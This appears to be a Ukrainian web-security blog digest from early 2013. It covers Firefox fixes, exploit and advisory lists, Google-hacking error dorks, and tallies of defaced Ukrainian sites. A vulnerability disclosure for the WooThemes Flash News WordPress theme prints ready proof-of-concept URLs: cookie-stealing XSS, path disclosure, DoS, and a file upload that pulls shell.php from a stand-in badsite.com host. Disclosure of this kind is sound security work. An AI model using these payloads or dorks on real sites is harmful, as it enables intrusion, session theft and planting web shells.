Websecurity - Веб безпека

02.02.2013

У січні, 18.01.2013, вийшов Mozilla Firefox 18.0.1. Нова версія браузера вийшла лише через десять днів після виходу Firefox 18 і в ній виправлені деякі баги допущені в останньому релізі.

Mozilla представила коригувальний випуск Firefox 18.0.1 у якому усунуто декілька недоробок, що впливають на якість роботи. Вирішені 4 проблеми в коді підтримки роботи через HTTP-проксі (витік пам’яті, проблеми в автоконфігурації); відключена підтримка HIDPI для зовнішніх моніторів для виключення помилкового рендеринга (наприклад, підказка виводилася на іншому екрані); виправлена помилка, що приводила до краху програвача Unity на платформі Mac OS X.

Хоча Мозіла і не відзначила серед виправлень жодних пов’язаних з безпекою браузера, на мій погляд в даному релізі є й секюріті виправлення. Зокрема це стосується витоків пам’яті при роботі з HTTP-проксі та краху Unity веб плеєра.

• Обновление Firefox 18.0.1 (деталі)

15.03.2013

Вже 05.02.2013 вийшов Mozilla Firefox 18.0.2. Нова версія браузера вийшла через 26 днів після виходу Firefox 18 і через 16 днів після виходу версії 18.0.1, і в ній виправлені чергові баги.

Mozilla представила коригувальний випуск Firefox 18.0.2 у якому усунуті проблеми зі стабільністю робити браузера. Це вибивання браузера при виконанні JavaScript. Цього разу розробники занесли багато багів в один (подібно до того, як вони це роблять з дірками) і виправили їх одним патчем. Хоча Мозіла і не відзначила це як виправлення безпеки, що типово для неї, але я відношу це до секюріті виправлення (бо це були DoS в браузері).

В даній добірці експлоіти в веб додатках:

• Joomla Component com_dv Arbitrary File Upload Vulnerability metasploit (деталі)
• Joomla mega menu module File Upload Vulnerability metasploit (деталі)
• Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass (деталі)
• Ruby On Rails XML Processor YAML Deserialization Code Execution (деталі)
• Novell Groupwise Internet Agent LDAP BIND Request Overflow Vulnerability (деталі)

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload та Information Leakage уразливості в темі Flash News для WordPress. А знайшов я уразливоті в цій темі від WooThemes ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні), а цього разу я дослідив й інші дірки в цій темі.

В інших темах від WooThemes аналогічна ситуація (раніше я привів перелік 89 уразливих тем для WP від них).

XSS (WASC-08):

http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/thumb.php?src=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в невиправлених версіях TimThumb):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Information Leakage (WASC-13):

http://site/wp-content/themes/flashnews/includes/test.php

XSS (WASC-08) (в PHP < 4.4.1, 4.4.3-4.4.6):

http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі версії теми Flash News для WordPress (в останніх версіях виправлені лише уразливості в thumb.php).

Виявлені численні уразливості безпеки в Adobe ColdFusion.

Уразливі версії: Adobe ColdFusion 9.0, ColdFusion 10.

Обхід аутентифікації, підвищення привілеїв, витік інформації.

• Многочисленные уязвимости безопасности в Adobe ColdFusion (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://civic.kmu.gov.ua (хакером HTC 28 DZ) - 26.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ladrada.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://nmckherson.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://postsense.net (хакером hacker)
• http://glambaby.com.ua (хакерами з 1923Turk) - 10.12.2012, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• Directory Traversal Vulnerability in Sitecom Home Storage Center (деталі)
• Apache CouchDB JSONP arbitrary code execution with Adobe Flash (деталі)
• Directory Traversal Vulnerability in Conceptronic GrabnGo Network Storage (деталі)
• Apache CouchDB DOM based Cross-Site Scripting via Futon UI (деталі)
• QNAP Turbo NAS Multiple Path Injection (деталі)
• Apache CouchDB Information disclosure via unescaped backslashes in URLs on Windows (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Transmission (деталі)
• SQL Injection Vulnerability in ImageCMS (деталі)
• Microsoft Security Bulletin MS12-061 - Important Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) (деталі)
• Cross-Site Scripting (XSS) vulnerability in gpEasy (деталі)

Продовжу тему “Error” Гугл хакінга (”Error” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information leakage уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “еррор” пошукових запитів:

“Fatal error” “on line”

“PHP Fatal error”

“Fatal error” main

“Fatal error” “Failed opening”

“Fatal error: Unable to read”

“Fatal error: Unable to open”

“Fatal error: Unable”

“Fatal error: Undefined class”

“Fatal error: Cannot redeclare”

“Internal Server Error”

В першому півріччі вже відбувся масовий взлом сайтів на сервері Cityhost, а в другому півріччі відбувся повторний взлом цього сервера. За період з 07.07.2012 по 29.01.2013 відбувся масовий взлом сайтів на сервері Cityhost. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер української компанії Cityhost. Який складався з серії дефейсів.

Всього було взломано 39 сайтів (в сумі 85 сайтів) на сервері української компанії CityNet (IP 77.120.115.235). Це наступні сайти: www.polki.kh.ua, rubin.kharkov.ua, www.deafsport.org.ua, chehoeva.com, eko-water.com.ua, kolopatriotiv.org, teach.co.ua, 1cb.com.ua, buh-audit.com.ua, e-teach.com.ua, orientir.co.ua, xn--j1amdg6b.in.ua, teach.biz.ua, uatraining.com.ua, 1c.orientir.co.ua, moretepla.com.ua, prykarpaty.net, sambir-bojky.prykarpaty.net, sambir-ptycia.prykarpaty.net, sambirkult.prykarpaty.net, sambirlis.prykarpaty.net, stslis.prykarpaty.net, tour.prykarpaty.net, turkamrada.prykarpaty.net, rvo.stsrda.gov.ua, arrs.org.ua, bilak.in.ua, bilaky.prykarpaty.net, dush.prykarpaty.net, favoryt.prykarpaty.net, favoryty.com.ua, gal-elektro.com.ua, jojo-haircosmetics.prykarpaty.net, mam.prykarpaty.net, stsrda.gov.ua, senselight.com.ua, ceramic-design.com.ua, videonik.net.ua, beeart.com.ua. Серед них українські державні сайти rvo.stsrda.gov.ua та stsrda.gov.ua.

З зазначених 39 сайтів 2 сайти був взломаний хакером Hmei7, 5 сайтів хакером Sejeal, 8 сайтів хакером MJHOOL-HKR, 20 сайтів хакером Dr.SHA6H, 3 сайти хакером nesta та 1 сайт хакером DaiLexX.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх 20 сайтів, немає сумнівів, що вони були взломані Dr.SHA6H через взлом серверу хостінг провайдера, або акаунтів, в яких було багато сайтів (всі інші дефейси проводилися під час взломів окремих сайтів). Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

P.S.

У лютому і березні продовжилися взломи сайтів на цьому сервері. Були дефейснуті ще 5 сайтів хакером Sejeal, 1 сайт хакером Hmei7 і 2 сайти хакером s13doeL.

Виявлені Cross-Site Scripting уразливості в Microsoft System Center Operations Manager.

Уразливі версії: Microsoft System Center Operations Manager 2007.

Міжсайтовий скриптінг в веб-консолі.

• Microsoft Security Bulletin MS13-003 - Important Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege (2748552) (деталі)

В даній добірці експлоіти в веб додатках:

• Joomla Component pm_advancedsearch4 File Upload Vulnerability (деталі)
• Joomla Component com_jsmusic File Upload Vulnerability (metasploit) (деталі)
• eXtplorer 2.1 Arbitrary File Upload Vulnerability (деталі)
• Microsoft Internet Explorer Option Element Use-After-Free Vulnerability (деталі)
• Broadcom DoS on BCM4325 and BCM4329 Devices (деталі)